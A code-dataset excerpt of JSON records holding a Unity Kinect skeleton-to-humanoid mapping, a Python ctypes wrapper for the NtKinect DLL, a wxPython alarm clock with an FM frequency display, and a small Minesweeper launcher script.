sinPitchOver2 = (float)System.Math.Sin ((double)pitchOver2);\n float cosPitchOver2 = (float)System.Math.Cos ((double)pitchOver2);\n float yawOver2 = yaw * 0.5f;\n float sinYawOver2 = (float)System.Math.Sin ((double)yawOver2);\n float cosYawOver2 = (float)System.Math.Cos ((double)yawOver2);\n Quaternion result;\n result.w = cosYawOver2 * cosPitchOver2 * cosRollOver2 + sinYawOver2 * sinPitchOver2 * sinRollOver2;\n result.x = cosYawOver2 * sinPitchOver2 * cosRollOver2 + sinYawOver2 * cosPitchOver2 * sinRollOver2;\n result.y = sinYawOver2 * cosPitchOver2 * cosRollOver2 - cosYawOver2 * sinPitchOver2 * sinRollOver2;\n result.z = cosYawOver2 * cosPitchOver2 * sinRollOver2 - sinYawOver2 * sinPitchOver2 * cosRollOver2;\n return result;\n }\n }\n class UnityChanSkeleton: HumanoidSkeleton {\n new protected static int[] jointSegment = new int[] {\n // left\n Kinect.JointType_ShoulderLeft, Kinect.JointType_ElbowLeft, // LeftUpperArm\n Kinect.JointType_ElbowLeft, Kinect.JointType_WristLeft, // LeftLowerArm\n Kinect.JointType_WristLeft, Kinect.JointType_HandLeft, // LeftHand\n Kinect.JointType_HipLeft, Kinect.JointType_KneeLeft, // LeftUpperLeg\n Kinect.JointType_KneeLeft, Kinect.JointType_AnkleLeft, // LeftLowerLeg6\n Kinect.JointType_AnkleLeft, Kinect.JointType_FootLeft, // LeftFoot\n // right\n Kinect.JointType_ShoulderRight, Kinect.JointType_ElbowRight, // RightUpperArm\n Kinect.JointType_ElbowRight, Kinect.JointType_WristRight, // RightLowerArm\n Kinect.JointType_WristRight, Kinect.JointType_HandRight, // RightHand\n Kinect.JointType_HipRight, Kinect.JointType_KneeRight, // RightUpperLeg\n Kinect.JointType_KneeRight, Kinect.JointType_AnkleRight, // RightLowerLeg\n Kinect.JointType_AnkleRight, Kinect.JointType_FootRight, // RightFoot\n };\n new protected static HumanBodyBones[] targetBone = new HumanBodyBones[] {\n HumanBodyBones.LeftUpperArm,\n HumanBodyBones.LeftLowerArm,\n HumanBodyBones.LeftHand,\n HumanBodyBones.LeftUpperLeg,\n HumanBodyBones.LeftLowerLeg,\n HumanBodyBones.LeftFoot,\n HumanBodyBones.RightUpperArm,\n HumanBodyBones.RightLowerArm,\n HumanBodyBones.RightHand,\n HumanBodyBones.RightUpperLeg,\n HumanBodyBones.RightLowerLeg,\n HumanBodyBones.RightFoot,\n };\n public UnityChanSkeleton(GameObject h):base(h) {}\n new public void set(Kinect kinect, int n, bool mirrored=false, bool move=false, bool headMove=false) {\n Vector3 faceDir = kinect.getFaceDirectionByTrackingId(kinect.skeletonTrackingId[n]);\n if (isSavedPosition == false\n\t && kinect.skeletonState[n][Kinect.JointType_SpineBase] != Kinect.TrackingState_NotTracked) {\n\tisSavedPosition = true;\n\tsavedPosition = kinect.skeleton[n][Kinect.JointType_SpineBase];\n }\n for (int i=0; i<kinect.skeleton[n].Count; i++) {\n\tVector3 jt = kinect.skeleton[n][i];\n\tif (mirrored) {\n\t joint[i] = new Vector3(-jt.x, jt.y, -jt.z);\n\t} else {\n\t joint[i] = new Vector3(jt.x, jt.y, savedPosition.z*2 - jt.z);\n\t}\n\tjointState[i] = kinect.skeletonState[n][i];\n }\n if (mirrored) {\n\tswapJoint(Kinect.JointType_ShoulderLeft, Kinect.JointType_ShoulderRight);\n\tswapJoint(Kinect.JointType_ElbowLeft, Kinect.JointType_ElbowRight);\n\tswapJoint(Kinect.JointType_WristLeft, Kinect.JointType_WristRight);\n\tswapJoint(Kinect.JointType_HandLeft, Kinect.JointType_HandRight);\n\tswapJoint(Kinect.JointType_HipLeft, Kinect.JointType_HipRight);\n\tswapJoint(Kinect.JointType_KneeLeft, Kinect.JointType_KneeRight);\n\tswapJoint(Kinect.JointType_AnkleLeft, Kinect.JointType_AnkleRight);\n\tswapJoint(Kinect.JointType_FootLeft, Kinect.JointType_FootRight);\n\tswapJoint(Kinect.JointType_HandTipLeft, Kinect.JointType_HandTipRight);\n\tswapJoint(Kinect.JointType_ThumbLeft, Kinect.JointType_ThumbRight);\n }\n for (int i=0; i<targetBone.Length; i++) {\n\tint s = jointSegment[2*i], e = jointSegment[2*i+1];\n\ttrackingSegment[targetBone[i]] = joint[e] - joint[s];\n\ttrackingState[targetBone[i]] = System.Math.Min(jointState[e],jointState[s]);\n }\n\n savedHumanoidRotation = humanoid.transform.rotation;\n humanoid.transform.rotation = Quaternion.identity;\n\n Vector3 waist = joint[Kinect.JointType_HipRight] - joint[Kinect.JointType_HipLeft];\n waist = new Vector3(waist.x, 0, waist.z);\n Quaternion rot = Quaternion.FromToRotation(Vector3.right,waist);\n Quaternion rotInv = Quaternion.Inverse(rot);\n\n Vector3 shoulder = joint[Kinect.JointType_ShoulderRight] - joint[Kinect.JointType_ShoulderLeft];\n shoulder = new Vector3(shoulder.x, 0, shoulder.z);\n Quaternion srot = Quaternion.FromToRotation(Vector3.right,shoulder);\n \n Quaternion defaultQ = Quaternion.AngleAxis(90, new Vector3(0,1,0) )\n\t* Quaternion.AngleAxis( -90, new Vector3(0,0,1 ) );\n foreach (HumanBodyBones b in targetBone) {\n\tif (rigBone[b].isValid && trackingState[b] != Kinect.TrackingState_NotTracked) {\n\t rigBone[b].transform.rotation = rotInv * Quaternion.FromToRotation(Vector3.up,trackingSegment[b]) * defaultQ;\n\t}\n }\n\n Quaternion q = Quaternion.AngleAxis(-90, new Vector3(0,1,0))\n\t* Quaternion.AngleAxis(-90, new Vector3(0,0,1));\n if (headMove && faceDir.magnitude > 1e-6) {\n\tfloat pitch = faceDir.x, yaw = faceDir.y, roll = faceDir.z;\n\tif (mirrored) {\n\t pitch = -pitch;\n\t roll = -roll;\n\t} else {\n\t pitch = -pitch;\n\t yaw = -yaw;\n\t}\n\trigBone[HumanBodyBones.Head].transform.rotation = Util.toQ(pitch, yaw, roll) * q;\n }\n\n if (rigBone[HumanBodyBones.Chest].isValid)\n\trigBone[HumanBodyBones.Chest].transform.rotation = srot * q;\n \n if (mirrored) {\n\thumanoid.transform.rotation = Quaternion.AngleAxis(180,Vector3.up) * rot;\n } else {\n\thumanoid.transform.rotation = rot;\n }\n if (move == true) {\n\tVector3 m = joint[Kinect.JointType_SpineBase];\n\tif (mirrored) m = new Vector3(-m.x, m.y, -m.z);\n\thumanoid.transform.position = m;\n }\n return;\n }\n }\n}\n"
},
{
"alpha_fraction": 0.774193525314331,
"alphanum_fraction": 0.774193525314331,
"avg_line_length": 17.600000381469727,
"blob_id": "0664d6f7da6cd93377775e9cca9ff5ad59a8c7a6",
"content_id": "40786030afb9db810f4ff6925cb4bd9bd794019c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 93,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 5,
"path": "/README.md",
"repo_name": "YoshihisaNitta/NtKinectDLL",
"src_encoding": "UTF-8",
"text": "# NtKinectDLL\n\nDLL Library and Wrappers for NtKinect\n\nhttp://nw.tsuda.ac.jp/lec/NtKinectDLL/\n"
},
{
"alpha_fraction": 0.6731509566307068,
"alphanum_fraction": 0.6864460110664368,
"avg_line_length": 30.627853393554688,
"blob_id": "6fca271c89fa36e259e533a9b333c2108bb19b79",
"content_id": "1b20048067f64b6c0722d088caec9a6aa59e3ccf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14291,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 438,
"path": "/NtKinect_py/NtKinect.py",
"repo_name": "YoshihisaNitta/NtKinectDLL",
"src_encoding": "UTF-8",
"text": "# ################################################\r\n# Copyright (c) 2017 by Yoshihisa Nitta\r\n# Released under the MIT License\r\n# http://opensource.org/licenses/mit-license.php\r\n# ################################################\r\n\r\n# NtKinect.py version 0.1 2017/11/08\r\n# http://nw.tsuda.ac.jp/lec/NtKinectDLL/\r\n#\r\n# requires:\r\n# NtKinectDLL version 1.2.5 or later\r\n\r\nfrom ctypes import *\r\n\r\n# ##############\r\n# Constants\r\n# ##############\r\n# Number\r\nbodyCount = 6\r\njointCount = 25\r\nrgbCols = 1920\r\nrgbRows = 1080\r\ndepthCols = 512\r\ndepthRows = 424\r\n# JointType\r\nJointType_SpineBase= 0\r\nJointType_SpineMid= 1\r\nJointType_Neck= 2\r\nJointType_Head= 3\r\nJointType_ShoulderLeft= 4\r\nJointType_ElbowLeft= 5\r\nJointType_WristLeft= 6\r\nJointType_HandLeft= 7\r\nJointType_ShoulderRight= 8\r\nJointType_ElbowRight= 9\r\nJointType_WristRight= 10\r\nJointType_HandRight= 11\r\nJointType_HipLeft= 12\r\nJointType_KneeLeft= 13\r\nJointType_AnkleLeft= 14\r\nJointType_FootLeft= 15\r\nJointType_HipRight= 16\r\nJointType_KneeRight= 17\r\nJointType_AnkleRight= 18\r\nJointType_FootRight= 19\r\nJointType_SpineShoulder= 20\r\nJointType_HandTipLeft= 21\r\nJointType_ThumbLeft= 22\r\nJointType_HandTipRight= 23\r\nJointType_ThumbRight= 24\r\n# TrackingState\r\nTrackingState_NotTracked= 0\r\nTrackingState_Inferred= 1\r\nTrackingState_Tracked= 2\r\n# FacePoint\r\nFacePointType_None= -1\r\nFacePointType_EyeLeft= 0\r\nFacePointType_EyeRight= 1\r\nFacePointType_Nose= 2\r\nFacePointType_MouthCornerLeft= 3\r\nFacePointType_MouthCornerRight= 4\r\nFacePointType_Count= FacePointType_MouthCornerRight + 1\r\n# a_FaceProperty\r\nFaceProperty_Happy= 0\r\nFaceProperty_Engaged= 1\r\nFaceProperty_WearingGlasses= 2\r\nFaceProperty_LeftEyeClosed= 3\r\nFaceProperty_RightEyeClosed= 4\r\nFaceProperty_MouthOpen= 5\r\nFaceProperty_MouthMoved= 6\r\nFaceProperty_LookingAway= 7\r\nFaceProperty_Count= FaceProperty_LookingAway + 1\r\n# FaceDetectionResult\r\nDetectionResult_Unknown= 0\r\nDetectionResult_No= 1\r\nDetectionResult_Maybe= 2\r\nDetectionResult_Yes= 3\r\n# HDFace\r\nHDFaceVerticesSize = 1347\r\n\r\n# ##################\r\n# DLL Functions\r\n# ################\r\nnt=windll.LoadLibrary('NtKinectDLL.dll')\r\nnt.getKinect.argtypes = (None)\r\nnt.getKinect.restype = c_void_p\r\nnt.stopKinect.argtypes=[c_void_p]\r\nnt.stopKinect.restype = None\r\n# OpenCV\r\nnt.imshow.argtypes=[c_void_p]\r\nnt.imshow.restype=None\r\nnt.imshowBlack.argtypes=[c_void_p]\r\nnt.imshowBlack.restype=None\r\n# CoordinateMapper\r\nnt.mapCameraPointToColorSpace.argtypes=[c_void_p,POINTER(c_float),POINTER(c_float),c_int]\r\nnt.mapCameraPointToColorSpace.restype=None\r\nnt.mapCameraPointToDepthSpace.argtypes=[c_void_p,POINTER(c_float),POINTER(c_float),c_int]\r\nnt.mapCameraPointToDepthSpace.restype=None\r\nnt.mapDepthPointToColorSpace.argtypes=[c_void_p,POINTER(c_float),POINTER(c_ushort),POINTER(c_float),c_int]\r\nnt.mapDepthPointToColorSpace.restype=None\r\nnt.mapDepthPointToCameraSpace.argtypes=[c_void_p,POINTER(c_float),POINTER(c_ushort),POINTER(c_float),c_int]\r\nnt.mapDepthPointToCameraSpace.restype=None\r\n# Multi Thread\r\nnt.acquire.argtypes=[c_void_p]\r\nnt.acquire.restype=None\r\nnt.release.argtypes=[c_void_p]\r\nnt.release.restype=None\r\n# Audio\r\nnt.setAudio.argtypes=[c_bool]\r\nnt.setAudio.restype=None\r\nnt.getBeamAngle.argtypes=[c_void_p]\r\nnt.getBeamAngle.restype=c_float\r\nnt.getBeamAngleConfidence.argtypes=[c_void_p]\r\nnt.getBeamAngleConfidence.restype=c_float\r\nnt.openAudio.argtypes=[c_void_p,c_char_p]\r\nnt.openAudio.restype=None\r\nnt.closeAudio.argtypes=[c_void_p]\r\nnt.closeAudio.restype=None\r\nnt.isOpenedAudio.argtypes=[c_void_p]\r\nnt.isOpenedAudio.restype=c_bool\r\n# RGB\r\nnt.setRGB.argtypes=[c_void_p]\r\nnt.setRGB.restype=None\r\nnt.getRGB.argtypes=[c_void_p,POINTER(c_ubyte)]\r\nnt.getRGB.restype=c_int\r\n# Depth\r\nnt.setDepth.argtypes=[c_void_p]\r\nnt.setDepth.restype=None\r\nnt.getDepth.argtypes=[c_void_p,POINTER(c_ushort)]\r\nnt.getDepth.restype=c_int\r\n# Infrared\r\nnt.setInfrared.argtypes=[c_void_p]\r\nnt.setInfrared.restype=None\r\nnt.getInfrared.argtypes=[c_void_p,POINTER(c_ushort)]\r\nnt.getInfrared.restype=c_int\r\n# BodyIndex\r\nnt.setBodyIndex.argtypes=[c_void_p]\r\nnt.setBodyIndex.restype=None\r\nnt.getBodyIndex.argtypes=[c_void_p,POINTER(c_ubyte)]\r\nnt.getBodyIndex.restype=c_int\r\n# Skeleton\r\nnt.setSkeleton.argtypes=[c_void_p]\r\nnt.setSkeleton.restype=None\r\nnt.getSkeleton.argtypes=[c_void_p,POINTER(c_float),POINTER(c_int),POINTER(c_int),POINTER(c_uint64)]\r\nnt.getSkeleton.restype=c_int\r\nnt.handState.argtypes=[c_void_p,c_int,c_bool]\r\nnt.handState.restype=c_int\r\n# Face\r\nnt.setFace.argtypes=[c_void_p,c_bool]\r\nnt.setFace.restype=None\r\nnt.getFace.argtypes=[c_void_p,POINTER(c_float),POINTER(c_float),POINTER(c_float),POINTER(c_int),POINTER(c_uint64)]\r\nnt.getFace.restype=c_int\r\n# HDFace\r\nnt.setHDFace.argtypes=[c_void_p]\r\nnt.setHDFace.restype=None\r\nnt.getHDFace.argtypes=[c_void_p,POINTER(c_float),POINTER(c_uint64),POINTER(c_int)]\r\nnt.getHDFace.restype=c_int\r\n# Gesture\r\nnt.setGestureFile.argtypes=[c_void_p,c_wchar_p]\r\nnt.setGestureFile.restype=None\r\nnt.setGesture.argtypes=[c_void_p]\r\nnt.setGesture.restype=None\r\nnt.getDiscreteGesture.argtypes=[c_void_p,POINTER(c_int),POINTER(c_float),POINTER(c_uint64)]\r\nnt.getDiscreteGesture.restype=c_int\r\nnt.getContinuousGesture.argtypes=[c_void_p,POINTER(c_int),POINTER(c_float),POINTER(c_uint64)]\r\nnt.getContinuousGesture.restype=c_int\r\nnt.getGidMapSize.argtypes=(None)\r\nnt.getGidMapSize.restype=c_int\r\n# Video\r\nnt.openVideo.argtypes=[c_void_p,c_wchar_p]\r\nnt.openVideo.restype=None\r\nnt.writeVideo.argtypes=[c_void_p]\r\nnt.writeVideo.restype=None\r\nnt.closeVideo.argtypes=[c_void_p]\r\nnt.closeVideo.restype=None\r\n\r\n# ###################\r\n# Python Variables\r\n# ###################\r\nkinect = nt.getKinect()\r\n\r\nbeamAngle = c_float(0.0)\r\nbeamAngleConfidence = c_float(0.0)\r\naudioTrackingId = c_uint64(0)\r\n\r\nrgbImage = (c_ubyte * 4 * rgbCols * rgbRows)()\r\np_rgbImage = cast(rgbImage,POINTER(c_ubyte))\r\n\r\ndepthImage = (c_ushort * depthCols * depthRows)()\r\np_depthImage = cast(depthImage,POINTER(c_ushort))\r\n\r\ninfraredImage = (c_ushort * depthCols * depthRows)()\r\np_infraredImage = cast(infraredImage,POINTER(c_ushort))\r\n\r\nbodyIndexImage = (c_ubyte * depthCols * depthRows)()\r\np_bodyIndexImage = cast(infraredImage,POINTER(c_ubyte))\r\n\r\nskeleton = []\r\nskeletonState = []\r\nskeletonId = []\r\nskeletonTrackingId = []\r\n\r\nskel = (c_float * 3 * jointCount * bodyCount)()\r\np_skel = cast(skel,POINTER(c_float))\r\nskelState = (c_int * jointCount * bodyCount )()\r\np_skelState = cast(skelState,POINTER(c_int))\r\nskelId = (c_int * jointCount * bodyCount )()\r\np_skelId = cast(skelId,POINTER(c_int))\r\nskelTrackingId = (c_uint64 * jointCount * bodyCount)()\r\np_skelTrackingId = cast(skelTrackingId,POINTER(c_uint64))\r\n\r\nfacePoint = []\r\nfaceRect = []\r\nfaceDirection = []\r\nfaceProperty = []\r\nfaceTrackingId = []\r\n\r\nfcPoint = (c_float * 3 * FacePointType_Count * bodyCount)()\r\np_fcPoint = cast(fcPoint,POINTER(c_float))\r\nfcRect = (c_float * 4 * bodyCount)()\r\np_fcRect = cast(fcRect,POINTER(c_float))\r\nfcDirection = (c_float * 3 * bodyCount)()\r\np_fcDirection = cast(fcDirection,POINTER(c_float))\r\nfcProperty = (c_int * FaceProperty_Count * bodyCount)()\r\np_fcProperty = cast(fcProperty,POINTER(c_int))\r\nfcTrackingId = (c_uint64 * bodyCount)()\r\np_fcTrackingId = cast(fcTrackingId,POINTER(c_uint64))\r\n\r\nhdfacePoint = (c_float * 3 * HDFaceVerticesSize * bodyCount)()\r\np_hdfacePoint = cast(hdfacePoint,POINTER(c_float))\r\nhdfaceTrackingId = (c_uint64 * bodyCount)()\r\np_hdfaceTrackingId = cast(hdfaceTrackingId,POINTER(c_uint64))\r\nhdfaceStatus = (c_int * 2 * bodyCount)()\r\np_hdfaceStatus = cast(hdfaceStatus,POINTER(c_int))\r\n\r\ndiscreteGesture = []\r\ngestureConfidence = []\r\ndiscreteGestureTrackingId = []\r\ncontinuousGesture = []\r\ngestureProgress = []\r\ncontinuousGestureTrackingId = []\r\n\r\ngstId = (c_int * (100 * bodyCount))()\r\np_gstId = cast(gstId, POINTER(c_int))\r\ngstFloat = (c_float * (100 * bodyCount))()\r\np_gstFloat = cast(gstFloat,POINTER(c_float))\r\ngstTrackingId = (c_uint64 * (100 * bodyCount))()\r\np_gstTrackingId = cast(gstTrackingId,POINTER(c_uint64))\r\n\r\n\r\n# ###################\r\n# Python Functions\r\n# ###################\r\n\r\ndef stopKinect():\r\n nt.stopKinect(kinect)\r\n \r\ndef imshow():\r\n nt.imshow(kinect)\r\ndef imshowBlack():\r\n nt.imshowBlack(kinect)\r\n\r\ndef mapCameraPointToColorSpace(skel,color,n):\r\n return nt.mapCameraPointToColorSpace(kinect,skel,color,n)\r\ndef mapCameraPointToDepthSpace(skel,color,n):\r\n return nt.mapCameraPointToDepthSpace(kinect,skel,color,n)\r\ndef mapDepthPointToColorSpace(depth,dth,color,n):\r\n return nt.mapDepthPointToColorSpace(kinect,depth,dth,color,n)\r\ndef mapDepthPointToCameraSpace(depth,dth,skel,n):\r\n return nt.mapDepthPointToCameraSpace(kinect,depth,dth,skel,n)\r\n\r\ndef acquire():\r\n nt.acquire(kinect)\r\ndef release():\r\n nt.release(kinect)\r\n\r\ndef setAudio(flag):\r\n global beamAngle, beamAngleConfidence, audioTrackingId\r\n nt.setAudio(kinect,flag)\r\n beamAngle = nt.getBeamAngle(kinect)\r\n beamAngleConfidence = nt.getBeamAngleConfidence(kinect)\r\n audioTrackingId = nt.getAudioTrackingId(kinect)\r\ndef openAudio(filename):\r\n nt.openAudio(kinect,filename)\r\ndef closeAudio():\r\n nt.closeAudio(kinect)\r\ndef isOpenedAudio():\r\n return nt.isOpenedAudio(kinect)\r\n\r\ndef setRGB():\r\n nt.setRGB(kinect)\r\n return getRGB()\r\ndef getRGB():\r\n return nt.getRGB(kinect, p_rgbImage)\r\n\r\ndef setDepth():\r\n nt.setDepth(kinect)\r\n return getDepth()\r\ndef getDepth():\r\n return nt.getDepth(kinect,p_depthImage)\r\n\r\ndef setInfrared():\r\n nt.setInfrared(kinect)\r\n return getInfrared()\r\ndef getInfrared():\r\n return nt.getInfrared(kinect,p_infraredImage)\r\n\r\ndef setBodyIndex():\r\n nt.setBodyIndex(kinect)\r\n return getBodyIndex()\r\ndef getBodyIndex():\r\n return nt.getBodyIndex(kinect,p_bodyIndexImage)\r\n\r\ndef setSkeleton():\r\n nt.setSkeleton(kinect)\r\n return getSkeleton()\r\ndef getSkeleton():\r\n global skeleton, skeletonState, skeletonId, skeletonTrackingId\r\n n = nt.getSkeleton(kinect,p_skel,p_skelState,p_skelId,p_skelTrackingId)\r\n if (n == 0):\r\n skeleton = []\r\n skeletonState = []\r\n skeletonId = []\r\n skeletonTrackingId = []\r\n return n\r\n skeleton = (c_float * 3 * jointCount * n)()\r\n skeletonState = (c_int * jointCount * n )()\r\n skeletonId = (c_int * jointCount * n )()\r\n skeletonTrackingId = (c_uint64 * jointCount * n)()\r\n for i in range(n):\r\n for j in range(jointCount):\r\n skeleton[i][j][0] = skel[i][j][0]\r\n skeleton[i][j][1] = skel[i][j][1]\r\n skeleton[i][j][2] = skel[i][j][2]\r\n skeletonId[i] = skelId[i]\r\n skeletonTrackingId[i] = skelTrackingId[i]\r\n return n\r\ndef setFace():\r\n nt.setFace(kinect, c_bool(True))\r\n return getFace()\r\nfaceFailCount = 0\r\ndef getFace():\r\n global faceFailCount, facePoint, faceRect, faceDirection, faceProperty, faceTrackingId\r\n n = nt.getFace(kinect,p_fcPoint,p_fcRect,p_fcDirection,p_fcProperty,p_fcTrackingId)\r\n if (n == 0):\r\n faceFailCount = faceFailCount + 1\r\n if faceFailCount < 10:\r\n return 0\r\n else:\r\n faceFailCount = 0\r\n facePoint = (c_float * 3 * FacePointType_Count * n)()\r\n faceRect = (c_float * 4 * n)()\r\n faceDirection = (c_float * 3 * n)()\r\n faceProperty = (c_int * FaceProperty_Count * n)()\r\n faceTrackingId = (c_uint64 * n)()\r\n for i in range(n):\r\n for j in range(FacePointType_Count):\r\n facePoint[i][j][0] = fcPoint[i][j][0]\r\n facePoint[i][j][1] = fcPoint[i][j][1]\r\n for j in range(4):\r\n faceRect[i][j] = fcRect[i][j]\r\n for j in range(3):\r\n faceDirection[i][j] = fcDirection[i][j]\r\n for j in range(FaceProperty_Count):\r\n faceProperty[i][j] = fcProperty[i][j]\r\n faceTrackingId[i] = fcTrackingId[i]\r\n return n\r\n\r\ndef setHDFace():\r\n nt.setHDFace(kinect)\r\n getHDFace()\r\ndef getHDFace():\r\n return nt.getHDFace(kinect,p_hdfacePoint,p_hdfaceTrackingID,p_hdfaceStatus)\r\n\r\ndef setGestureFile(filename):\r\n nt.setGestureFile(filename)\r\ndef setGestureId(name,id):\r\n return nt.setGestureId(kinect,name,id)\r\ndef setGesture():\r\n nt.setGesture(kinect)\r\ndef getDiscreteGesture():\r\n global gstId, p_gstId, gstFloat, p_gstFloat, gstTrackingId, p_gstTrackingId\r\n global discreteGesture, gestureConfidence, discreteGestureTrackingId\r\n mapSize = nt.getGidMapSize()\r\n size = bodyCount * mapSize\r\n if len(gstId) < mapSize:\r\n gstId = (c_int * (mapSize * bodyCount))()\r\n p_gstId = cast(gstId, POINTER(c_int))\r\n gstFloat = (c_float * (mapSize * bodyCount))()\r\n p_gstFloat = cast(gstFloat,POINTER(c_float))\r\n gstTrackingId = (c_uint64 * (mapSize * bodyCount))()\r\n p_gstTrackingId = cast(gstTrackingId,POINTER(c_uint64))\r\n n = nt.getDiscreteGesture(kinect,p_gstId,p_gstFloat,p_gstTrackingId)\r\n discreteGesture = (c_int * n)()\r\n gestureConfidence = (c_float * n)()\r\n discreteGestureTrackingId = (c_uint64 * n)()\r\n for i in range(n):\r\n discreteGesture[i] = gstId[i]\r\n gestureConfidence[i] = gstFloat[i]\r\n discreteGestureTrackingId[i] = gstTrackingId[i]\r\n return n\r\ndef getContinuousGesture():\r\n global gstId, p_gstId, gstFloat, p_gstFloat, gstTrackingId, p_gstTrackingId\r\n global continuousGesture, gestureProgress, continuousGestureTrackingId\r\n mapSize = nt.getGidMapSize()\r\n size = bodyCount * mapSize\r\n if len(gstId) < mapSize:\r\n gstId = (c_int * (mapSize * bodyCount))()\r\n p_gstId = cast(gstId, POINTER(c_int))\r\n gstFloat = (c_float * (mapSize * bodyCount))()\r\n p_gstFloat = cast(gstFloat,POINTER(c_float))\r\n gstTrackingId = (c_uint64 * (mapSize * bodyCount))()\r\n p_gstTrackingId = cast(gstTrackingId,POINTER(c_uint64))\r\n n = nt.getContinousGesture(kinect,p_gstId,p_gstFloat,p_gstTrackingId)\r\n continuousGesture = (c_int * n)()\r\n gestureProgress = (c_float * n)()\r\n continuousGestureTrackingId = (c_uint64 * n)()\r\n for i in range(n):\r\n continuousGesture[i] = gstId[i]\r\n gestureProgress[i] = gstFloat[i]\r\n continuousGestureTrackingId[i] = gstTrackingId[i]\r\n return n\r\n\r\ndef openVideo(filename):\r\n nt.openVideo(kinect,filename)\r\ndef writeVideo():\r\n nt.writeVideo(kinect)\r\ndef closeVideo():\r\n nt.closeVideo()\r\n\r\n \r\ndef doJob(n):\r\n for x in range(n):\r\n setRGB()\r\n setSkeleton()\r\n setFace()\r\n imshowBlack()\r\n stopKinect()\r\n"
}
] | 5 |
Daredoom/Sveglia-raspberry
|
https://github.com/Daredoom/Sveglia-raspberry
|
57322b8eb0f3a32c10b6fef42e9ff2ad0a7fa4a3
|
226afd592a537817e45be3d532904d4b44021c60
|
b2c48eee5bd0354f6273e9d2110e4966127122f8
|
refs/heads/master
| 2021-01-01T20:49:10.521984 | 2019-10-14T06:54:59 | 2019-10-14T06:54:59 | 98,936,389 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5765027403831482,
"alphanum_fraction": 0.5939890742301941,
"avg_line_length": 31.105262756347656,
"blob_id": "5a2c316b08431bacab25aca899a8bb1924a4f6cc",
"content_id": "6684e0346c6dd456e64ec2121367d642be46a9f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1830,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 57,
"path": "/Sveglia.py",
"repo_name": "Daredoom/Sveglia-raspberry",
"src_encoding": "UTF-8",
"text": "import datetime\nimport wx\n\n\nclass sveglia(wx.Frame):\n\n def __init__(self):\n wx.Frame.__init__(self, parent=None, title=\"Sveglia\", id=-1)\n self.frequenza = 99.4\n font = wx.Font(30, wx.DECORATIVE, wx.ITALIC, wx.NORMAL)\n\n self.orologio = wx.StaticText(self, -1, label=(datetime.datetime.now().strftime(\"%A %d-%m-%y %H:%M:%S\")))\n self.orologio.SetFont(font)\n\n self.lblfrequenza = wx.StaticText(self, -1, label=str(self.frequenza))\n self.lblfrequenza.SetFont(font)\n\n sizer = wx.GridSizer(1, 2, 5, 5)\n sizer.Add(self.orologio, 0, wx.ALL | wx.CENTRE | wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTRE_VERTICAL)\n sizer.Add(self.lblfrequenza, 1, wx.ALL | wx.CENTRE | wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTRE_VERTICAL)\n self.SetSizer(sizer)\n\n self.update()\n self.Fit()\n\n self.Bind(wx.EVT_KEY_DOWN, self.onKey)\n self.Bind(wx.EVT_KEY_DOWN, self.cambiaVolume)\n self.ShowFullScreen(True)\n\n def cambiaFrequenza(self, evt):\n keyCode = evt.GetKeyCode()\n # print(keyCode)\n if keyCode == 43:\n self.frequenza += 0.1\n self.lblfrequenza.SetLabel(\"{0:0.1f}\".format(self.frequenza))\n elif keyCode == 45:\n self.frequenza -= 0.1\n self.lblfrequenza.SetLabel(\"{0:0.1f}\".format(self.frequenza))\n else:\n evt.Skip()\n\n def onKey(self, evt):\n key_code = evt.GetKeyCode()\n if key_code == wx.WXK_ESCAPE:\n self.Destroy()\n else:\n evt.Skip()\n\n def update(self):\n current_time = datetime.datetime.strftime(datetime.datetime.now(), '%A %d-%m-%Y %H:%M:%S')\n self.orologio.SetLabel(current_time)\n wx.CallLater(1000, self.update)\n\napp = wx.App(False)\nbase = sveglia()\nbase.Show()\napp.MainLoop()\n"
}
] | 1 |
JavWil/mynewrep
|
https://github.com/JavWil/mynewrep
|
ac8e8da91e44db4338d84d49f2a168b62bb4cd11
|
436d610dad19c0e1019a081be32c557ce77334e9
|
154390d44df186bb17d8ade254718385c4e27458
|
refs/heads/master
| 2020-06-08T11:24:04.441500 | 2019-06-22T11:22:37 | 2019-06-22T11:22:37 | 193,220,768 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6645962595939636,
"alphanum_fraction": 0.6708074808120728,
"avg_line_length": 16.88888931274414,
"blob_id": "096832b766d2f1ee720c8715dc71ee1ba0921d6d",
"content_id": "2021e2671bc16e7d939b9bbd615df1095973cce6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 161,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 9,
"path": "/func.py",
"repo_name": "JavWil/mynewrep",
"src_encoding": "UTF-8",
"text": "\"\"\" \nCreate a function that doubles the input number\n-----\nParams: var any numerical vaule\nreturn: a doubled number\n\"\"\"\n\ndef double(var):\n return var * 2\n"
}
] | 1 |
tfisz/Minesweeper
|
https://github.com/tfisz/Minesweeper
|
d12eb8e38a19de01169faa32288400d64e7798d9
|
fe60f26d857d6efdaacd18843f5d32cd8ea06626
|
3645b95ced0b9420801ee17c3d7d7000391297be
|
refs/heads/master
| 2022-11-13T07:09:06.684635 | 2020-06-19T09:06:32 | 2020-06-19T09:06:32 | 273,447,126 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7549019455909729,
"alphanum_fraction": 0.7549019455909729,
"avg_line_length": 16.08333396911621,
"blob_id": "8739f46087bf74455db71d5d3b52a375def00b83",
"content_id": "e7b1c7c13fd567ba0c397f3695d54477b22445b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 204,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 12,
"path": "/main.py",
"repo_name": "tfisz/Minesweeper",
"src_encoding": "UTF-8",
"text": "from minesweeper import *\n\nglobal root\n# create Tk widget\nroot = Tk()\n# set program title\nroot.title(\"Minesweeper\")\n# create game instance\nminesweeper = Minesweeper(root)\n\n# run event loop\nroot.mainloop()"
},
{
"alpha_fraction": 0.5075933933258057,
